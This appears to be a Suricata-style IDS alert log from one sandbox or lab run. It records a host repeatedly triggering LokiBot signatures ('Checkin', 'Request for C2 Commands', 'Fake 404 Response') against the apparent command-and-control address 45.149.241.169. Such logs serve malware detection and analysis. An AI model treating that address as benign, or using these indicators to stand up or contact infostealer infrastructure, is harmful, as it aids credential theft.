2024-10-03T09:20:58.316279+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.10	49716	45.149.241.169	80	TCP
2024-10-03T09:20:58.316279+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.10	49716	45.149.241.169	80	TCP
2024-10-03T09:20:59.140817+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.10	49716	45.149.241.169	80	TCP
2024-10-03T09:20:59.140817+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.10	49716	45.149.241.169	80	TCP
2024-10-03T09:20:59.146093+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.149.241.169	80	192.168.2.10	49716	TCP
2024-10-03T09:20:59.297568+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.10	49717	45.149.241.169	80	TCP
2024-10-03T09:20:59.297568+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.10	49717	45.149.241.169	80	TCP
2024-10-03T09:20:59.297568+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.10	49717	45.149.241.169	80	TCP
2024-10-03T09:21:00.116580+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.10	49717	45.149.241.169	80	TCP
2024-10-03T09:21:00.116580+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.10	49717	45.149.241.169	80	TCP
2024-10-03T09:21:00.189299+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.149.241.169	80	192.168.2.10	49717	TCP
2024-10-03T09:21:00.494707+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.10	49718	45.149.241.169	80	TCP
2024-10-03T09:21:00.494707+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.10	49718	45.149.241.169	80	TCP
2024-10-03T09:21:00.494707+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.10	49718	45.149.241.169	80	TCP
2024-10-03T09:21:01.613318+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.10	49718	45.149.241.169	80	TCP
2024-10-03T09:21:01.613318+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.10	49718	45.149.241.169	80	TCP
2024-10-03T09:21:01.618178+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.149.241.169	80	192.168.2.10	49718	TCP
2024-10-03T09:21:01.777716+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.10	49719	45.149.241.169	80	TCP
2024-10-03T09:21:01.777716+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.10	49719	45.149.241.169	80	TCP
2024-10-03T09:21:01.777716+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.10	49719	45.149.241.169	80	TCP
2024-10-03T09:21:03.526211+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.10	49719	45.149.241.169	80	TCP
2024-10-03T09:21:03.526211+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.10	49719	45.149.241.169	80	TCP
2024-10-03T09:21:03.531218+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.149.241.169	80	192.168.2.10	49719	TCP
2024-10-03T09:21:03.684048+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.10	49720	45.149.241.169	80	TCP
2024-10-03T09:21:03.684048+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.10	49720	45.149.241.169	80	TCP
2024-10-03T09:21:03.684048+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.10	49720	45.149.241.169	80	TCP
2024-10-03T09:21:04.410658+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.10	49720	45.149.241.169	80	TCP
2024-10-03T09:21:04.410658+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.10	49720	45.149.241.169	80	TCP
2024-10-03T09:21:04.415995+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.149.241.169	80	192.168.2.10	49720	TCP
2024-10-03T09:21:04.600648+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.10	49721	45.149.241.169	80	TCP
2024-10-03T09:21:04.600648+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.10	49721	45.149.241.169	80	TCP
2024-10-03T09:21:04.600648+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.10	49721	45.149.241.169	80	TCP
2024-10-03T09:21:05.365447+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.10	49721	45.149.241.169	80	TCP
2024-10-03T09:21:05.365447+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.10	49721	45.149.241.169	80	TCP
2024-10-03T09:21:05.371100+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.149.241.169	80	192.168.2.10	49721	TCP
2024-10-03T09:21:05.528198+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.10	49722	45.149.241.169	80	TCP
2024-10-03T09:21:05.528198+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.10	49722	45.149.241.169	80	TCP
2024-10-03T09:21:05.528198+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.10	49722	45.149.241.169	80	TCP
2024-10-03T09:21:06.262913+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.10	49722	45.149.241.169	80	TCP
2024-10-03T09:21:06.262913+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.10	49722	45.149.241.169	80	TCP
2024-10-03T09:21:06.270016+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.149.241.169	80	192.168.2.10	49722	TCP
2024-10-03T09:21:06.423848+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.10	49723	45.149.241.169	80	TCP
2024-10-03T09:21:06.423848+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.10	49723	45.149.241.169	80	TCP
2024-10-03T09:21:06.423848+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.10	49723	45.149.241.169	80	TCP
2024-10-03T09:21:07.156686+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.10	49723	45.149.241.169	80	TCP
2024-10-03T09:21:07.156686+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.10	49723	45.149.241.169	80	TCP
2024-10-03T09:21:07.162168+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.149.241.169	80	192.168.2.10	49723	TCP
2024-10-03T09:21:07.339146+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.10	49724	45.149.241.169	80	TCP
2024-10-03T09:21:07.339146+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.10	49724	45.149.241.169	80	TCP
2024-10-03T09:21:07.339146+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.10	49724	45.149.241.169	80	TCP
2024-10-03T09:21:08.095625+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.10	49724	45.149.241.169	80	TCP
2024-10-03T09:21:08.095625+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.10	49724	45.149.241.169	80	TCP
2024-10-03T09:21:08.100420+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.149.241.169	80	192.168.2.10	49724	TCP
2024-10-03T09:21:08.254833+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.10	49725	45.149.241.169	80	TCP
2024-10-03T09:21:08.254833+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.10	49725	45.149.241.169	80	TCP
2024-10-03T09:21:08.254833+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.10	49725	45.149.241.169	80	TCP
2024-10-03T09:21:09.011680+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.10	49725	45.149.241.169	80	TCP
2024-10-03T09:21:09.011680+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.10	49725	45.149.241.169	80	TCP
2024-10-03T09:21:09.016619+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.149.241.169	80	192.168.2.10	49725	TCP
2024-10-03T09:21:09.163793+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.10	49726	45.149.241.169	80	TCP
2024-10-03T09:21:09.163793+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.10	49726	45.149.241.169	80	TCP
2024-10-03T09:21:09.163793+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.10	49726	45.149.241.169	80	TCP
2024-10-03T09:21:09.861236+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.10	49726	45.149.241.169	80	TCP
2024-10-03T09:21:09.861236+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.10	49726	45.149.241.169	80	TCP
2024-10-03T09:21:09.866203+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.149.241.169	80	192.168.2.10	49726	TCP
2024-10-03T09:21:10.038728+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.10	49727	45.149.241.169	80	TCP
2024-10-03T09:21:10.038728+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.10	49727	45.149.241.169	80	TCP
2024-10-03T09:21:10.038728+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.10	49727	45.149.241.169	80	TCP
2024-10-03T09:21:10.868266+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.10	49727	45.149.241.169	80	TCP
2024-10-03T09:21:10.868266+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.10	49727	45.149.241.169	80	TCP
2024-10-03T09:21:10.873454+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.149.241.169	80	192.168.2.10	49727	TCP
2024-10-03T09:21:11.038525+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.10	49728	45.149.241.169	80	TCP
2024-10-03T09:21:11.038525+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.10	49728	45.149.241.169	80	TCP
2024-10-03T09:21:11.038525+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.10	49728	45.149.241.169	80	TCP
2024-10-03T09:21:11.918016+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.10	49728	45.149.241.169	80	TCP
2024-10-03T09:21:11.918016+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.10	49728	45.149.241.169	80	TCP
2024-10-03T09:21:11.922869+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.149.241.169	80	192.168.2.10	49728	TCP
2024-10-03T09:21:12.097651+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.10	49729	45.149.241.169	80	TCP
2024-10-03T09:21:12.097651+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.10	49729	45.149.241.169	80	TCP
2024-10-03T09:21:12.097651+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.10	49729	45.149.241.169	80	TCP
2024-10-03T09:21:12.878143+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.10	49729	45.149.241.169	80	TCP
2024-10-03T09:21:12.878143+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.10	49729	45.149.241.169	80	TCP
2024-10-03T09:21:12.883774+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.149.241.169	80	192.168.2.10	49729	TCP
2024-10-03T09:21:13.053982+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.10	49730	45.149.241.169	80	TCP
2024-10-03T09:21:13.053982+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.10	49730	45.149.241.169	80	TCP
2024-10-03T09:21:13.053982+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.10	49730	45.149.241.169	80	TCP
2024-10-03T09:21:13.804474+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.10	49730	45.149.241.169	80	TCP
2024-10-03T09:21:13.804474+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.10	49730	45.149.241.169	80	TCP
2024-10-03T09:21:13.809511+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.149.241.169	80	192.168.2.10	49730	TCP
2024-10-03T09:21:13.963379+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.10	49731	45.149.241.169	80	TCP
2024-10-03T09:21:13.963379+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.10	49731	45.149.241.169	80	TCP
2024-10-03T09:21:13.963379+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.10	49731	45.149.241.169	80	TCP
2024-10-03T09:21:14.643309+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.10	49731	45.149.241.169	80	TCP
2024-10-03T09:21:14.643309+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.10	49731	45.149.241.169	80	TCP
2024-10-03T09:21:14.648261+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.149.241.169	80	192.168.2.10	49731	TCP
2024-10-03T09:21:14.812196+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.10	49732	45.149.241.169	80	TCP
2024-10-03T09:21:14.812196+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.10	49732	45.149.241.169	80	TCP
2024-10-03T09:21:14.812196+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.10	49732	45.149.241.169	80	TCP
2024-10-03T09:21:15.448371+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.10	49732	45.149.241.169	80	TCP
2024-10-03T09:21:15.448371+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.10	49732	45.149.241.169	80	TCP
2024-10-03T09:21:15.453200+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.149.241.169	80	192.168.2.10	49732	TCP
2024-10-03T09:21:15.631002+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.10	49733	45.149.241.169	80	TCP
2024-10-03T09:21:15.631002+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.10	49733	45.149.241.169	80	TCP
2024-10-03T09:21:15.631002+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.10	49733	45.149.241.169	80	TCP
2024-10-03T09:21:17.426363+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.10	49733	45.149.241.169	80	TCP
2024-10-03T09:21:17.426363+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.10	49733	45.149.241.169	80	TCP
2024-10-03T09:21:17.431251+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.149.241.169	80	192.168.2.10	49733	TCP
2024-10-03T09:21:17.618667+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.10	49734	45.149.241.169	80	TCP
2024-10-03T09:21:17.618667+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.10	49734	45.149.241.169	80	TCP
2024-10-03T09:21:17.618667+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.10	49734	45.149.241.169	80	TCP
2024-10-03T09:21:18.676941+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.10	49734	45.149.241.169	80	TCP
2024-10-03T09:21:18.676941+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.10	49734	45.149.241.169	80	TCP
2024-10-03T09:21:18.848565+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.10	49735	45.149.241.169	80	TCP
2024-10-03T09:21:18.848565+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.10	49735	45.149.241.169	80	TCP
2024-10-03T09:21:18.848565+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.10	49735	45.149.241.169	80	TCP
2024-10-03T09:21:19.692115+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.10	49735	45.149.241.169	80	TCP
2024-10-03T09:21:19.692115+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.10	49735	45.149.241.169	80	TCP
2024-10-03T09:21:19.697873+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.149.241.169	80	192.168.2.10	49735	TCP
2024-10-03T09:21:20.073300+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.10	49736	45.149.241.169	80	TCP
2024-10-03T09:21:20.073300+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.10	49736	45.149.241.169	80	TCP
2024-10-03T09:21:20.073300+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.10	49736	45.149.241.169	80	TCP
2024-10-03T09:21:20.718523+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.10	49736	45.149.241.169	80	TCP
2024-10-03T09:21:20.718523+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.10	49736	45.149.241.169	80	TCP
2024-10-03T09:21:20.723425+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.149.241.169	80	192.168.2.10	49736	TCP
2024-10-03T09:21:20.894549+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.10	49737	45.149.241.169	80	TCP
2024-10-03T09:21:20.894549+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.10	49737	45.149.241.169	80	TCP
2024-10-03T09:21:20.894549+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.10	49737	45.149.241.169	80	TCP
2024-10-03T09:21:21.526883+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.10	49737	45.149.241.169	80	TCP
2024-10-03T09:21:21.526883+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.10	49737	45.149.241.169	80	TCP
2024-10-03T09:21:21.531766+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.149.241.169	80	192.168.2.10	49737	TCP
2024-10-03T09:21:21.709486+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.10	49738	45.149.241.169	80	TCP
2024-10-03T09:21:21.709486+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.10	49738	45.149.241.169	80	TCP
2024-10-03T09:21:21.709486+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.10	49738	45.149.241.169	80	TCP
2024-10-03T09:21:22.447679+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.10	49738	45.149.241.169	80	TCP
2024-10-03T09:21:22.447679+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.10	49738	45.149.241.169	80	TCP
2024-10-03T09:21:22.455429+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.149.241.169	80	192.168.2.10	49738	TCP
2024-10-03T09:21:22.731827+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.10	49739	45.149.241.169	80	TCP
2024-10-03T09:21:22.731827+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.10	49739	45.149.241.169	80	TCP
2024-10-03T09:21:22.731827+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.10	49739	45.149.241.169	80	TCP
2024-10-03T09:21:23.391639+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.10	49739	45.149.241.169	80	TCP
2024-10-03T09:21:23.391639+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.10	49739	45.149.241.169	80	TCP
2024-10-03T09:21:23.396516+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.149.241.169	80	192.168.2.10	49739	TCP
2024-10-03T09:21:23.541526+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.10	49740	45.149.241.169	80	TCP
2024-10-03T09:21:23.541526+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.10	49740	45.149.241.169	80	TCP
2024-10-03T09:21:23.541526+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.10	49740	45.149.241.169	80	TCP
2024-10-03T09:21:24.274196+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.10	49740	45.149.241.169	80	TCP
2024-10-03T09:21:24.274196+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.10	49740	45.149.241.169	80	TCP
2024-10-03T09:21:24.279091+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.149.241.169	80	192.168.2.10	49740	TCP
2024-10-03T09:21:24.429751+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.10	49741	45.149.241.169	80	TCP
2024-10-03T09:21:24.429751+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.10	49741	45.149.241.169	80	TCP
2024-10-03T09:21:24.429751+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.10	49741	45.149.241.169	80	TCP
2024-10-03T09:21:25.101836+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.10	49741	45.149.241.169	80	TCP
2024-10-03T09:21:25.101836+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.10	49741	45.149.241.169	80	TCP
2024-10-03T09:21:25.106678+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.149.241.169	80	192.168.2.10	49741	TCP
2024-10-03T09:21:25.256730+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.10	49742	45.149.241.169	80	TCP
2024-10-03T09:21:25.256730+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.10	49742	45.149.241.169	80	TCP
2024-10-03T09:21:25.256730+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.10	49742	45.149.241.169	80	TCP
2024-10-03T09:21:25.961812+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.10	49742	45.149.241.169	80	TCP
2024-10-03T09:21:25.961812+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.10	49742	45.149.241.169	80	TCP
2024-10-03T09:21:25.966662+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.149.241.169	80	192.168.2.10	49742	TCP
2024-10-03T09:21:26.118736+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.10	49743	45.149.241.169	80	TCP
2024-10-03T09:21:26.118736+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.10	49743	45.149.241.169	80	TCP
2024-10-03T09:21:26.118736+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.10	49743	45.149.241.169	80	TCP
2024-10-03T09:21:26.738758+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.10	49743	45.149.241.169	80	TCP
2024-10-03T09:21:26.738758+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.10	49743	45.149.241.169	80	TCP
2024-10-03T09:21:26.743539+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.149.241.169	80	192.168.2.10	49743	TCP
2024-10-03T09:21:26.897709+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.10	49744	45.149.241.169	80	TCP
2024-10-03T09:21:26.897709+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.10	49744	45.149.241.169	80	TCP
2024-10-03T09:21:26.897709+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.10	49744	45.149.241.169	80	TCP
2024-10-03T09:21:27.713273+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.10	49744	45.149.241.169	80	TCP
2024-10-03T09:21:27.713273+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.10	49744	45.149.241.169	80	TCP
2024-10-03T09:21:27.718153+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.149.241.169	80	192.168.2.10	49744	TCP
2024-10-03T09:21:27.873598+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.10	49745	45.149.241.169	80	TCP
2024-10-03T09:21:27.873598+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.10	49745	45.149.241.169	80	TCP
2024-10-03T09:21:27.873598+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.10	49745	45.149.241.169	80	TCP
2024-10-03T09:21:28.560491+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.10	49745	45.149.241.169	80	TCP
2024-10-03T09:21:28.560491+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.10	49745	45.149.241.169	80	TCP
2024-10-03T09:21:28.565618+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.149.241.169	80	192.168.2.10	49745	TCP
2024-10-03T09:21:28.712017+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.10	49746	45.149.241.169	80	TCP
2024-10-03T09:21:28.712017+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.10	49746	45.149.241.169	80	TCP
2024-10-03T09:21:28.712017+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.10	49746	45.149.241.169	80	TCP
2024-10-03T09:21:29.491681+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.10	49746	45.149.241.169	80	TCP
2024-10-03T09:21:29.491681+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.10	49746	45.149.241.169	80	TCP
2024-10-03T09:21:29.496599+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.149.241.169	80	192.168.2.10	49746	TCP
2024-10-03T09:21:29.654591+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.10	49747	45.149.241.169	80	TCP
2024-10-03T09:21:29.654591+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.10	49747	45.149.241.169	80	TCP
2024-10-03T09:21:29.654591+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.10	49747	45.149.241.169	80	TCP
2024-10-03T09:21:30.421696+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.10	49747	45.149.241.169	80	TCP
2024-10-03T09:21:30.421696+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.10	49747	45.149.241.169	80	TCP
2024-10-03T09:21:30.428216+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.149.241.169	80	192.168.2.10	49747	TCP
2024-10-03T09:21:30.592777+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.10	49749	45.149.241.169	80	TCP
2024-10-03T09:21:30.592777+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.10	49749	45.149.241.169	80	TCP
2024-10-03T09:21:30.592777+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.10	49749	45.149.241.169	80	TCP
2024-10-03T09:21:31.421949+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.10	49749	45.149.241.169	80	TCP
2024-10-03T09:21:31.421949+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.10	49749	45.149.241.169	80	TCP
2024-10-03T09:21:31.426744+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.149.241.169	80	192.168.2.10	49749	TCP
2024-10-03T09:21:32.603612+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.10	49750	45.149.241.169	80	TCP
2024-10-03T09:21:32.603612+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.10	49750	45.149.241.169	80	TCP
2024-10-03T09:21:32.603612+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.10	49750	45.149.241.169	80	TCP
2024-10-03T09:21:33.372102+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.10	49750	45.149.241.169	80	TCP
2024-10-03T09:21:33.372102+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.10	49750	45.149.241.169	80	TCP
2024-10-03T09:21:33.376905+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.149.241.169	80	192.168.2.10	49750	TCP
2024-10-03T09:21:33.526238+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.10	49751	45.149.241.169	80	TCP
